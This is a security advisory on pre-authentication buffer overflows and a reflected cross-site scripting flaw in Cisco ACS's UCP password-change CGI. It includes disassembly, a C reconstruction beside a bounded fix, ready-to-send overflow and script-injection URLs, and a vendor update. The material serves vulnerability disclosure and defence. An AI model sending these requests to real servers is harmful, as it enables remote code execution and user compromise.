[NT] Cisco ACS UCP Pre-Authentication Buffer Overflows
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 16 Mar 2008 14:42:07 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Cisco ACS UCP Pre-Authentication Buffer Overflows
------------------------------------------------------------------------
SUMMARY
Cisco Secure Access Control Server (ACS) for Windows User-Changeable
Password (UCP) application is a set of CGI programs and web site contents
installed on Microsoft IIS.
From the Cisco Advisory: "The UCP application enables end users to change
their ACS passwords with a web-based utility. When users need to change
their own passwords, they can access the UCP web page by using a supported
web browser, validate their existing credentials, and then change their
password via the utility."
The CGI /securecgi-bin/CSUserCGI.exe suffers from multiple buffer
overflows exploitable remotely through the HTTP protocol before
authentication. Additionally, CSUserCGI.exe suffers from a non-persistent
Cross Site Scripting vulnerability.
DETAILS
Vulnerable Systems:
* Cisco ACS version 3 and version 4
* Cisco UCP version 3.3.4.12.5
* Cisco CSuserCGI version 3.3.1
Immune Systems:
* Cisco ACS UCP version 4.2
The main() function of CSuserCGI.exe compares the first command line
argument passed to the program using strcmp() against a list of supported
arguments, among them "Logout", "Main", "ChangePass", etc.
For most of the arguments, it simply parses the remaining arguments and
passes them to a wsprintf() call with format strings like
"Action=%s&Username=%s&OldPass=%s&NetPass=%s". The destination buffer of
these calls is located in the .data segment of the application.
In case of the "Logout" argument, main() passes the second argument,
usually of the form "1234.xyzab.c.username.", as well as a char[] buffer
on the stack to a function that first extracts the string up to the first
'.' character using strtok and then copies the string into the supplied
char[] buffer. The char buffer is 96 bytes long. Accordingly, if the
string before the first dot character exceeds this length, the buffer as
well as the saved return address are overwritten.
.text:00401065 mov eax, [ebx+8] ; get argv[2]
.text:00401068 test eax, eax
.text:0040106A jz loc_401520
.text:00401070 push eax ; char *
.text:00401071 call sub_402870
...
.text:00402870 sub esp, 60h
.text:00402873 mov ecx, 17h
.text:00402878 xor eax, eax
.text:0040287A push edi
.text:0040287B lea edi, [esp+64h+var_60]
.text:0040287F rep stosd
.text:00402881 mov ecx, [esp+64h+arg_0]
.text:00402885 stosw
.text:00402887 stosb
.text:00402888 lea eax, [esp+64h+var_60]
.text:0040288C push eax ; int
.text:0040288D push ecx ; char *
.text:0040288E call sub_402940
...
.text:00402940 mov ecx, [esp+arg_0]
.text:00402944 xor eax, eax
.text:00402946 test ecx, ecx
.text:00402948 jz locret_402A11
.text:0040294E push ebx
.text:0040294F push esi
.text:00402950 push edi
.text:00402951 push offset a_ ; "."
.text:00402956 push ecx ; char *
.text:00402957 call _strtok
.text:0040295C mov edi, eax
.text:0040295E or ecx, 0FFFFFFFFh
.text:00402961 xor eax, eax
.text:00402963 mov ebx, [esp+14h+arg_4]
.text:00402967 repne scasb
.text:00402969 not ecx
.text:0040296B sub edi, ecx
.text:0040296D lea edx, [ebx+1]
.text:00402970 mov eax, ecx
.text:00402972 mov esi, edi
.text:00402974 mov edi, edx
.text:00402976 push offset a_ ; "."
.text:0040297B shr ecx, 2
.text:0040297E rep movsd
.text:00402980 mov ecx, eax
.text:00402982 push 0 ; char *
.text:00402984 and ecx, 3
.text:00402987 rep movsb
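The copy routine described above, reconstructed in C beside a bounded replacement. This is an added example written for this page, not Cisco's code; the buffer size (96) and the argument shape "1234.xyzab.c.username." come from the advisory, while the function names and the probe helper are assumptions made here.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

#define TOKEN_BUF 96   /* the 96-byte stack buffer named in the advisory */

/* Reconstruction of the unbounded copy: strtok() isolates the text before
 * the first '.', its length is measured (repne scasb) and copied wholesale
 * (rep movsd / rep movsb) into dst with no comparison against TOKEN_BUF. */
static void copy_first_token_unbounded(char *arg, char dst[TOKEN_BUF])
{
    char *tok = strtok(arg, ".");
    if (tok != NULL)
        memcpy(dst, tok, strlen(tok) + 1);   /* no bound check: the defect */
}

/* Bounded replacement: measure first, refuse anything that cannot fit
 * together with its terminator, and leave the caller's input untouched. */
static bool copy_first_token_bounded(const char *arg, char dst[TOKEN_BUF])
{
    size_t n = strcspn(arg, ".");            /* bytes before the first '.' */
    if (n == 0 || n >= TOKEN_BUF)
        return false;
    memcpy(dst, arg, n);
    dst[n] = '\0';
    return true;
}

/* Check helper (hypothetical): builds a constructed Logout-style argument
 * "AAA...A.xyzab.c.user." with token_len 'A's; returns the copied length
 * or -1 when the bounded routine rejects the token. */
static int probe_token_length(size_t token_len)
{
    char arg[256], dst[TOKEN_BUF];
    if (token_len > 200)
        token_len = 200;                     /* keep the probe inside arg[] */
    memset(arg, 'A', token_len);
    strcpy(arg + token_len, ".xyzab.c.user.");
    return copy_first_token_bounded(arg, dst) ? (int)strlen(dst) : -1;
}

int main(void)
{
    char sample[] = "1234.xyzab.c.username.";   /* constructed, per advisory */
    char dst[TOKEN_BUF];
    copy_first_token_unbounded(sample, dst);    /* safe here: token is 4 bytes */
    printf("token: %s\n", dst);
    printf("95-byte token -> %d, 96-byte token -> %d\n",
           probe_token_length(95), probe_token_length(96));
    return 0;
}
```

The boundary the probe exposes is the one the advisory describes: 95 bytes plus a terminator fill the buffer exactly, and the 96th byte is where the unbounded version begins writing past it.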
Example:
The following request will cause EIP to be overwritten with 0x42424242.
The line may wrap, depending on how you view this file.
https://target/securecgi-bin/CSUserCGI.exe?Logout+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB.xyzab.c.hacker.
A non-persistent Cross Site Scripting vulnerability can also be triggered
using the Help facility of the CGI. An example request would be as
follows. The line may wrap, depending on how you view this file.
https://target/securecgi-bin/CSUserCGI.exe?Help+00.lala.c.hacker%22%22%22%3E%3Ch1%3EHello_Cisco%3C/h1%3E
Solution:
Update to UCP version 4.2. See the Cisco Advisory for how to obtain fixed
software:
http://www.cisco.com/warp/public/707/cisco-sa-20080312-ucp.shtml